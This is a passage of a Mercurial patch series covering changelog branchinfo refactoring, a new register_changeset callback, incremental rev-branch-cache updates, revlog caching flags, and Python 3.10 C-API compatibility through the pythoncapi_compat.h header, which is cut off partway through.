2020-03-06 -#[cfg(not(target_os = "linux"))] -compile_error!( - "`hg-core` has only been tested on Linux and will most \ - likely not behave correctly on other platforms." -); - use crate::utils::hg_path::{HgPathBuf, HgPathError}; pub use filepatterns::{ parse_pattern_syntax, read_pattern_file, IgnorePattern, diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -609,6 +609,12 @@ # and its build is not explictely disabled (for external build # as Linux distributions would do) if self.distribution.rust and self.rust: + if not sys.platform.startswith('linux'): + self.warn( + "rust extensions have only been tested on Linux " + "and may not behave correctly on other platforms" + ) + for rustext in ruststandalones: rustext.build('' if self.inplace else self.build_lib) # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1610670608 -3600 # Fri Jan 15 01:30:08 2021 +0100 # Node ID cad17d50736ca5bd3ba83b82697461a2cf646fdc # Parent cabc5e9366c55ac4c446e474f00dd593dd5e5816 changelog: move branchinfo to changelogrevision The function parses the extra dictionary after looking up the changelogrevision. To avoid duplicated look up, it is better to provide it as property of changelogrevision instead. Keep the function for a release cycle as at least the topic extension depends on it. Differential Revision: https://phab.mercurial-scm.org/D9779 diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -200,6 +200,7 @@ p1copies = attr.ib(default=None) p2copies = attr.ib(default=None) description = attr.ib(default=b'') + branchinfo = attr.ib(default=(_defaultextra[b'branch'], False)) class changelogrevision(object): @@ -372,6 +373,11 @@ def description(self): return encoding.tolocal(self._text[self._offsets[3] + 2 :]) + @property + def branchinfo(self): + extra = self.extra + return encoding.tolocal(extra.get(b"branch")), b'close' in extra + class changelog(revlog.revlog): def __init__(self, opener, trypending=False): @@ -601,8 +607,7 @@ This function exists because creating a changectx object just to access this is costly.""" - extra = self.changelogrevision(rev).extra - return encoding.tolocal(extra.get(b"branch")), b'close' in extra + return self.changelogrevision(rev).branchinfo def _nodeduplicatecallback(self, transaction, node): # keep track of revisions that got "re-added", eg: unbunde of know rev. diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -65,4 +65,5 @@ == Internal API Changes == - + * `changelog.branchinfo` is deprecated and will be removed after 5.8. + It is superseded by `changelogrevision.branchinfo`. # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611012053 -3600 # Tue Jan 19 00:20:53 2021 +0100 # Node ID 0903d6b9b1dfc66f52fcb5794a71a2cde22313ef # Parent cad17d50736ca5bd3ba83b82697461a2cf646fdc repository: introduce register_changeset callback The new callback is called whenever a changeset is added to the repository (commit, unbundle or exchange). Since the bulk operations already parse the changeset (readfiles or full changesetrevision), always use the latter to avoid redundant lookups. The first consumer of the new interface needs to look at extra. Differential Revision: https://phab.mercurial-scm.org/D9780 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -323,7 +323,10 @@ cgnodes.append(node) def onchangelog(cl, node): - efilesset.update(cl.readfiles(node)) + rev = cl.rev(node) + ctx = cl.changelogrevision(rev) + efilesset.update(ctx.files) + repo.register_changeset(rev, ctx) self.changelogheader() deltas = self.deltaiter() diff --git a/mercurial/commit.py b/mercurial/commit.py --- a/mercurial/commit.py +++ b/mercurial/commit.py @@ -97,6 +97,9 @@ extra, ) rev = repo[n].rev() + if oldtip != repo.changelog.tiprev(): + repo.register_changeset(rev, repo.changelog.changelogrevision(rev)) + xp1, xp2 = p1.hex(), p2 and p2.hex() or b'' repo.hook( b'pretxncommit', diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -372,6 +372,8 @@ # so we can set the linkrev accordingly when manifests are added. manifestnodes[rev] = revision.manifest + repo.register_changeset(rev, revision) + nodesbyphase = {phase: set() for phase in phases.phasenames.values()} remotebookmarks = {} diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -1641,6 +1641,14 @@ def revbranchcache(): pass + def register_changeset(rev, changelogrevision): + """Extension point for caches for new nodes. + + Multiple consumers are expected to need parts of the changelogrevision, + so it is provided as optimization to avoid duplicate lookups. A simple + cache would be fragile when other revisions are accessed, too.""" + pass + def branchtip(branchtip, ignoremissing=False): """Return the tip node for a given branch.""" diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -2062,6 +2062,9 @@ self._revbranchcache = branchmap.revbranchcache(self.unfiltered()) return self._revbranchcache + def register_changeset(self, rev, changelogrevision): + pass + def branchtip(self, branch, ignoremissing=False): """return the tip node for a given branch # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1610672339 -3600 # Fri Jan 15 01:58:59 2021 +0100 # Node ID 3e91d9978becaca67812d6ce38f14fcbeddbeea2 # Parent 0903d6b9b1dfc66f52fcb5794a71a2cde22313ef branchmap: update rev-branch-cache incrementally Historically, the revision to branch mapping cache was updated on demand and shared via bundle2 to avoid the cost of rebuilding on first use. Use the new `register_changeset` callback and update rbc directly on every change. Make the transfer of the bundle part redundant, but keep it for the moment to avoid the test churn. Over all, "hg unbundle" for large bundles is less than 1.8% slower for different larger repositories and that seems to a reasonable trade off. Differential Revision: https://phab.mercurial-scm.org/D9781 diff --git a/mercurial/branchmap.py b/mercurial/branchmap.py --- a/mercurial/branchmap.py +++ b/mercurial/branchmap.py @@ -706,8 +706,10 @@ self._setcachedata(rev, reponode, branchidx) return b, close - def setdata(self, branch, rev, node, close): + def setdata(self, rev, changelogrevision): """add new data information to the cache""" + branch, close = changelogrevision.branchinfo + if branch in self._namesreverse: branchidx = self._namesreverse[branch] else: @@ -716,7 +718,7 @@ self._namesreverse[branch] = branchidx if close: branchidx |= _rbccloseflag - self._setcachedata(rev, node, branchidx) + self._setcachedata(rev, self._repo.changelog.node(rev), branchidx) # If no cache data were readable (non exists, bad permission, etc) # the cache was bypassing itself by setting: # diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -2478,35 +2478,10 @@ @parthandler(b'cache:rev-branch-cache') def handlerbc(op, inpart): - """receive a rev-branch-cache payload and update the local cache - - The payload is a series of data related to each branch - - 1) branch name length - 2) number of open heads - 3) number of closed heads - 4) open heads nodes - 5) closed heads nodes - """ - total = 0 - rawheader = inpart.read(rbcstruct.size) - cache = op.repo.revbranchcache() - cl = op.repo.unfiltered().changelog - while rawheader: - header = rbcstruct.unpack(rawheader) - total += header[1] + header[2] - utf8branch = inpart.read(header[0]) - branch = encoding.tolocal(utf8branch) - for x in pycompat.xrange(header[1]): - node = inpart.read(20) - rev = cl.rev(node) - cache.setdata(branch, rev, node, False) - for x in pycompat.xrange(header[2]): - node = inpart.read(20) - rev = cl.rev(node) - cache.setdata(branch, rev, node, True) - rawheader = inpart.read(rbcstruct.size) - cache.write() + """Legacy part, ignored for compatibility with bundles from or + for Mercurial before 5.7. Newer Mercurial computes the cache + efficiently enough during unbundling that the additional transfer + is unnecessary.""" @parthandler(b'pushvars') diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -2063,7 +2063,7 @@ return self._revbranchcache def register_changeset(self, rev, changelogrevision): - pass + self.revbranchcache().setdata(rev, changelogrevision) def branchtip(self, branch, ignoremissing=False): """return the tip node for a given branch diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -44,6 +44,9 @@ * The `branchmap` cache is updated more intelligently and can be significantly faster for repositories with many branches and changesets. + * The `rev-branch-cache` is now updated incrementally whenever changesets + are added. + == New Experimental Features == diff --git a/tests/test-acl.t b/tests/test-acl.t --- a/tests/test-acl.t +++ b/tests/test-acl.t @@ -204,6 +204,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -283,6 +284,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -806,6 +808,7 @@ acl: acl.deny.bookmarks not enabled acl: bookmark access granted: "ef1ea85a6374b77d6da9dcda9541f498f2d17df7" on bookmark "moving-bookmark" bundle2-input-bundle: 7 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache invalid branch cache (served.hidden): tip differs added 1 changesets with 1 changes to 1 files @@ -982,6 +985,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1318,6 +1322,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1408,6 +1413,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1577,6 +1583,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total diff --git a/tests/test-inherit-mode.t b/tests/test-inherit-mode.t --- a/tests/test-inherit-mode.t +++ b/tests/test-inherit-mode.t @@ -134,6 +134,8 @@ 00660 ../push/.hg/00changelog.i 00770 ../push/.hg/cache/ 00660 ../push/.hg/cache/branch2-base + 00660 ../push/.hg/cache/rbc-names-v1 + 00660 ../push/.hg/cache/rbc-revs-v1 00660 ../push/.hg/dirstate 00660 ../push/.hg/requires 00770 ../push/.hg/store/ diff --git a/tests/test-rebase-conflicts.t b/tests/test-rebase-conflicts.t --- a/tests/test-rebase-conflicts.t +++ b/tests/test-rebase-conflicts.t @@ -318,10 +318,10 @@ bundle2-input-part: total payload size 1686 bundle2-input-part: "cache:rev-branch-cache" (advisory) supported bundle2-input-part: total payload size 74 - truncating cache/rbc-revs-v1 to 56 bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 3 parts total + truncating cache/rbc-revs-v1 to 72 added 2 changesets with 2 changes to 1 files updating the branch cache invalid branch cache (served): tip differs # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611150433 -3600 # Wed Jan 20 14:47:13 2021 +0100 # Node ID 711ba0f1057e5fd1a229ce3c120c6817519bf300 # Parent 3e91d9978becaca67812d6ce38f14fcbeddbeea2 revlog: decouple caching from addrevision callback for addgroup For changesets, it is useful to cache the content as it will almost always be processed afterwards. For manifests on the other hand, the content is often not used directly as there is a fast path for deltas. Explicitly disable the cache in exchangev2's manifest handling for that reason. Differential Revision: https://phab.mercurial-scm.org/D9847 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -334,6 +334,7 @@ deltas, csmap, trp, + alwayscache=True, addrevisioncb=onchangelog, duplicaterevisioncb=ondupchangelog, ): diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -423,6 +423,7 @@ iterrevisions(), linkrev, weakref.proxy(tr), + alwayscache=True, addrevisioncb=onchangeset, duplicaterevisioncb=ondupchangeset, ) diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -769,7 +769,13 @@ ``nullid``, in which case the header from the delta can be ignored and the delta used as the fulltext. + ``alwayscache`` instructs the lower layers to cache the content of the + newly added revision, even if it needs to be explicitly computed. + This used to be the default when ``addrevisioncb`` was provided up to + Mercurial 5.8. + ``addrevisioncb`` should be called for each node as it is committed. + ``duplicaterevisioncb`` should be called for each pre-existing node. ``maybemissingparents`` is a bool indicating whether the incoming data may reference parents/ancestor revisions that aren't present. diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -1836,6 +1836,7 @@ deltas, linkmapper, transaction, + alwayscache=False, addrevisioncb=None, duplicaterevisioncb=None, ): @@ -1843,6 +1844,7 @@ deltas, linkmapper, transaction, + alwayscache=alwayscache, addrevisioncb=addrevisioncb, duplicaterevisioncb=duplicaterevisioncb, ) diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2375,6 +2375,7 @@ deltas, linkmapper, transaction, + alwayscache=False, addrevisioncb=None, duplicaterevisioncb=None, ): @@ -2475,7 +2476,7 @@ (baserev, delta), ifh, dfh, - alwayscache=bool(addrevisioncb), + alwayscache=alwayscache, deltacomputer=deltacomputer, ) diff --git a/mercurial/unionrepo.py b/mercurial/unionrepo.py --- a/mercurial/unionrepo.py +++ b/mercurial/unionrepo.py @@ -128,6 +128,7 @@ deltas, linkmapper, transaction, + alwayscache=False, addrevisioncb=None, duplicaterevisioncb=None, maybemissingparents=False, # HG changeset patch # User Victor Stinner <vstinner@python.org> # Date 1607939069 -3600 # Mon Dec 14 10:44:29 2020 +0100 # Node ID e92ca942ddca2b10cd9ae1321dd0193203ca4d25 # Parent 711ba0f1057e5fd1a229ce3c120c6817519bf300 cext: add Python 3.10 support * Replace "Py_TYPE(obj) = type;" with "Py_SET_TYPE(obj, type);" * Add pythoncapi_compat.h header file to get Py_SET_TYPE() on Python 2.7-3.8. Header file added to mercurial/ and contrib/python-zstandard/zstd/common/. In Python 3.10, Py_TYPE(obj) must not longer be used as an l-value. pythoncapi_compat.h comes from: https://github.com/pythoncapi/pythoncapi_compat Differential Revision: https://phab.mercurial-scm.org/D9825 diff --git a/contrib/clang-format-ignorelist b/contrib/clang-format-ignorelist --- a/contrib/clang-format-ignorelist +++ b/contrib/clang-format-ignorelist @@ -9,3 +9,4 @@ hgext/fsmonitor/pywatchman/**.c mercurial/thirdparty/**.c mercurial/thirdparty/**.h +mercurial/pythoncapi_compat.h diff --git a/contrib/python-zstandard/c-ext/bufferutil.c b/contrib/python-zstandard/c-ext/bufferutil.c --- a/contrib/python-zstandard/c-ext/bufferutil.c +++ b/contrib/python-zstandard/c-ext/bufferutil.c @@ -758,7 +758,7 @@ }; void bufferutil_module_init(PyObject* mod) { - Py_TYPE(&ZstdBufferWithSegmentsType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferWithSegmentsType, &PyType_Type); if (PyType_Ready(&ZstdBufferWithSegmentsType) < 0) { return; } @@ -766,7 +766,7 @@ Py_INCREF(&ZstdBufferWithSegmentsType); PyModule_AddObject(mod, "BufferWithSegments", (PyObject*)&ZstdBufferWithSegmentsType); - Py_TYPE(&ZstdBufferSegmentsType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferSegmentsType, &PyType_Type); if (PyType_Ready(&ZstdBufferSegmentsType) < 0) { return; } @@ -774,7 +774,7 @@ Py_INCREF(&ZstdBufferSegmentsType); PyModule_AddObject(mod, "BufferSegments", (PyObject*)&ZstdBufferSegmentsType); - Py_TYPE(&ZstdBufferSegmentType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferSegmentType, &PyType_Type); if (PyType_Ready(&ZstdBufferSegmentType) < 0) { return; } @@ -782,7 +782,7 @@ Py_INCREF(&ZstdBufferSegmentType); PyModule_AddObject(mod, "BufferSegment", (PyObject*)&ZstdBufferSegmentType); - Py_TYPE(&ZstdBufferWithSegmentsCollectionType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferWithSegmentsCollectionType, &PyType_Type); if (PyType_Ready(&ZstdBufferWithSegmentsCollectionType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionchunker.c b/contrib/python-zstandard/c-ext/compressionchunker.c --- a/contrib/python-zstandard/c-ext/compressionchunker.c +++ b/contrib/python-zstandard/c-ext/compressionchunker.c @@ -348,12 +348,12 @@ }; void compressionchunker_module_init(PyObject* module) { - Py_TYPE(&ZstdCompressionChunkerIteratorType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionChunkerIteratorType, &PyType_Type); if (PyType_Ready(&ZstdCompressionChunkerIteratorType) < 0) { return; } - Py_TYPE(&ZstdCompressionChunkerType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionChunkerType, &PyType_Type); if (PyType_Ready(&ZstdCompressionChunkerType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressiondict.c b/contrib/python-zstandard/c-ext/compressiondict.c --- a/contrib/python-zstandard/c-ext/compressiondict.c +++ b/contrib/python-zstandard/c-ext/compressiondict.c @@ -400,7 +400,7 @@ }; void compressiondict_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressionDictType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionDictType, &PyType_Type); if (PyType_Ready(&ZstdCompressionDictType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionparams.c b/contrib/python-zstandard/c-ext/compressionparams.c --- a/contrib/python-zstandard/c-ext/compressionparams.c +++ b/contrib/python-zstandard/c-ext/compressionparams.c @@ -556,7 +556,7 @@ }; void compressionparams_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressionParametersType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionParametersType, &PyType_Type); if (PyType_Ready(&ZstdCompressionParametersType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionreader.c b/contrib/python-zstandard/c-ext/compressionreader.c --- a/contrib/python-zstandard/c-ext/compressionreader.c +++ b/contrib/python-zstandard/c-ext/compressionreader.c @@ -811,7 +811,7 @@ void compressionreader_module_init(PyObject* mod) { /* TODO make reader a sub-class of io.RawIOBase */ - Py_TYPE(&ZstdCompressionReaderType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionReaderType, &PyType_Type); if (PyType_Ready(&ZstdCompressionReaderType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionwriter.c b/contrib/python-zstandard/c-ext/compressionwriter.c --- a/contrib/python-zstandard/c-ext/compressionwriter.c +++ b/contrib/python-zstandard/c-ext/compressionwriter.c @@ -365,7 +365,7 @@ }; void compressionwriter_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressionWriterType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionWriterType, &PyType_Type); if (PyType_Ready(&ZstdCompressionWriterType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressobj.c b/contrib/python-zstandard/c-ext/compressobj.c --- a/contrib/python-zstandard/c-ext/compressobj.c +++ b/contrib/python-zstandard/c-ext/compressobj.c @@ -249,7 +249,7 @@ }; void compressobj_module_init(PyObject* module) { - Py_TYPE(&ZstdCompressionObjType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionObjType, &PyType_Type); if (PyType_Ready(&ZstdCompressionObjType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressor.c b/contrib/python-zstandard/c-ext/compressor.c --- a/contrib/python-zstandard/c-ext/compressor.c +++ b/contrib/python-zstandard/c-ext/compressor.c @@ -619,7 +619,7 @@ goto finally; } - Py_SIZE(output) = outBuffer.pos; + Py_SET_SIZE(output, outBuffer.pos); finally: PyBuffer_Release(&source); @@ -1659,7 +1659,7 @@ }; void compressor_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressorType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressorType, &PyType_Type); if (PyType_Ready(&ZstdCompressorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressoriterator.c b/contrib/python-zstandard/c-ext/compressoriterator.c --- a/contrib/python-zstandard/c-ext/compressoriterator.c +++ b/contrib/python-zstandard/c-ext/compressoriterator.c @@ -228,7 +228,7 @@ }; void compressoriterator_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressorIteratorType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressorIteratorType, &PyType_Type); if (PyType_Ready(&ZstdCompressorIteratorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressionreader.c b/contrib/python-zstandard/c-ext/decompressionreader.c --- a/contrib/python-zstandard/c-ext/decompressionreader.c +++ b/contrib/python-zstandard/c-ext/decompressionreader.c @@ -774,7 +774,7 @@ void decompressionreader_module_init(PyObject* mod) { /* TODO make reader a sub-class of io.RawIOBase */ - Py_TYPE(&ZstdDecompressionReaderType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressionReaderType, &PyType_Type); if (PyType_Ready(&ZstdDecompressionReaderType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressionwriter.c b/contrib/python-zstandard/c-ext/decompressionwriter.c --- a/contrib/python-zstandard/c-ext/decompressionwriter.c +++ b/contrib/python-zstandard/c-ext/decompressionwriter.c @@ -288,7 +288,7 @@ }; void decompressionwriter_module_init(PyObject* mod) { - Py_TYPE(&ZstdDecompressionWriterType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressionWriterType, &PyType_Type); if (PyType_Ready(&ZstdDecompressionWriterType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressobj.c b/contrib/python-zstandard/c-ext/decompressobj.c --- a/contrib/python-zstandard/c-ext/decompressobj.c +++ b/contrib/python-zstandard/c-ext/decompressobj.c @@ -195,7 +195,7 @@ }; void decompressobj_module_init(PyObject* module) { - Py_TYPE(&ZstdDecompressionObjType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressionObjType, &PyType_Type); if (PyType_Ready(&ZstdDecompressionObjType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressor.c b/contrib/python-zstandard/c-ext/decompressor.c --- a/contrib/python-zstandard/c-ext/decompressor.c +++ b/contrib/python-zstandard/c-ext/decompressor.c @@ -1811,7 +1811,7 @@ }; void decompressor_module_init(PyObject* mod) { - Py_TYPE(&ZstdDecompressorType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressorType, &PyType_Type); if (PyType_Ready(&ZstdDecompressorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressoriterator.c b/contrib/python-zstandard/c-ext/decompressoriterator.c --- a/contrib/python-zstandard/c-ext/decompressoriterator.c +++ b/contrib/python-zstandard/c-ext/decompressoriterator.c @@ -242,7 +242,7 @@ }; void decompressoriterator_module_init(PyObject* mod) { - Py_TYPE(&ZstdDecompressorIteratorType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressorIteratorType, &PyType_Type); if (PyType_Ready(&ZstdDecompressorIteratorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/frameparams.c b/contrib/python-zstandard/c-ext/frameparams.c --- a/contrib/python-zstandard/c-ext/frameparams.c +++ b/contrib/python-zstandard/c-ext/frameparams.c @@ -128,7 +128,7 @@ }; void frameparams_module_init(PyObject* mod) { - Py_TYPE(&FrameParametersType) = &PyType_Type; + Py_SET_TYPE(&FrameParametersType, &PyType_Type); if (PyType_Ready(&FrameParametersType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/python-zstandard.h b/contrib/python-zstandard/c-ext/python-zstandard.h --- a/contrib/python-zstandard/c-ext/python-zstandard.h +++ b/contrib/python-zstandard/c-ext/python-zstandard.h @@ -9,6 +9,7 @@ #define PY_SSIZE_T_CLEAN #include <Python.h> #include "structmember.h" +#include <pythoncapi_compat.h> #define ZSTD_STATIC_LINKING_ONLY #define ZDICT_STATIC_LINKING_ONLY diff --git a/contrib/python-zstandard/zstd/common/pythoncapi_compat.h b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h new file mode 100644 --- /dev/null +++ b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h @@ -0,0 +1,278 @@ +// Header file providing new functions of the Python C API to old Python +// versions. +// +// File distributed under the MIT license. +// +// Homepage: +// https://github.com/pythoncapi/pythoncapi_compat +// +// Latest version: +// https://raw.githubusercontent.com/pythoncapi/pythoncapi_compat/master/pythoncapi_compat.h + +#ifndef PYTHONCAPI_COMPAT +#define PYTHONCAPI_COMPAT + +#ifdef __cplusplus +extern "C" { +#endif + +#include <Python.h> +#include "frameobject.h" // PyFrameObject, PyFrame_GetBack() + + +// Cast argument to PyObject* type. +#ifndef _PyObject_CAST +# define _PyObject_CAST(op) ((PyObject*)(op)) +#endif + + +// bpo-42262 added Py_NewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_NewRef) +static inline PyObject* _Py_NewRef(PyObject *obj) +{ + Py_INCREF(obj); + return obj; +} +#define Py_NewRef(obj) _Py_NewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-42262 added Py_XNewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_XNewRef) +static inline PyObject* _Py_XNewRef(PyObject *obj) +{ + Py_XINCREF(obj); + return obj; +} +#define Py_XNewRef(obj) _Py_XNewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-39573 added Py_SET_REFCNT() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_REFCNT) +static inline void _Py_SET_REFCNT(PyObject *ob, Py_ssize_t refcnt) +{ + ob->ob_refcnt = refcnt; +} +#define Py_SET_REFCNT(ob, refcnt) _Py_SET_REFCNT((PyObject*)(ob), refcnt) +#endif + + +// bpo-39573 added Py_SET_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_TYPE) +static inline void +_Py_SET_TYPE(PyObject *ob, PyTypeObject *type) +{ + ob->ob_type = type; +} +#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type) +#endif + + +// bpo-39573 added Py_SET_SIZE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_SIZE) +static inline void +_Py_SET_SIZE(PyVarObject *ob, Py_ssize_t size) +{ + ob->ob_size = size; +} +#define Py_SET_SIZE(ob, size) _Py_SET_SIZE((PyVarObject*)(ob), size) +#endif + + +// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyCodeObject* +PyFrame_GetCode(PyFrameObject *frame) +{ + PyCodeObject *code; + assert(frame != NULL); + code = frame->f_code; + assert(code != NULL); + Py_INCREF(code); + return code; +} +#endif + +static inline PyCodeObject* +_PyFrame_GetCodeBorrow(PyFrameObject *frame) +{ + PyCodeObject *code = PyFrame_GetCode(frame); + Py_DECREF(code); + return code; // borrowed reference +} + + +// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyFrame_GetBack(PyFrameObject *frame) +{ + PyFrameObject *back; + assert(frame != NULL); + back = frame->f_back; + Py_XINCREF(back); + return back; +} +#endif + +static inline PyFrameObject* +_PyFrame_GetBackBorrow(PyFrameObject *frame) +{ + PyFrameObject *back = PyFrame_GetBack(frame); + Py_XDECREF(back); + return back; // borrowed reference +} + + +// bpo-39947 added PyThreadState_GetInterpreter() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyThreadState_GetInterpreter(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->interp; +} +#endif + + +// bpo-40429 added PyThreadState_GetFrame() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyThreadState_GetFrame(PyThreadState *tstate) +{ + PyFrameObject *frame; + assert(tstate != NULL); + frame = tstate->frame; + Py_XINCREF(frame); + return frame; +} +#endif + +static inline PyFrameObject* +_PyThreadState_GetFrameBorrow(PyThreadState *tstate) +{ + PyFrameObject *frame = PyThreadState_GetFrame(tstate); + Py_XDECREF(frame); + return frame; // borrowed reference +} + + +// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyInterpreterState_Get(void) +{ + PyThreadState *tstate; + PyInterpreterState *interp; + + tstate = PyThreadState_GET(); + if (tstate == NULL) { + Py_FatalError("GIL released (tstate is NULL)"); + } + interp = tstate->interp; + if (interp == NULL) { + Py_FatalError("no current interpreter"); + } + return interp; +} +#endif + + +// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a6 +#if 0x030700A1 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x030900A6 +static inline uint64_t +PyThreadState_GetID(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->id; +} +#endif + + +// bpo-37194 added PyObject_CallNoArgs() to Python 3.9.0a1 +#if PY_VERSION_HEX < 0x030900A1 +static inline PyObject* +PyObject_CallNoArgs(PyObject *func) +{ + return PyObject_CallFunctionObjArgs(func, NULL); +} +#endif + + +// bpo-39245 made PyObject_CallOneArg() public (previously called +// _PyObject_CallOneArg) in Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 +static inline PyObject* +PyObject_CallOneArg(PyObject *func, PyObject *arg) +{ + return PyObject_CallFunctionObjArgs(func, arg, NULL); +} +#endif + + +// bpo-40024 added PyModule_AddType() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline int +PyModule_AddType(PyObject *module, PyTypeObject *type) +{ + const char *name, *dot; + + 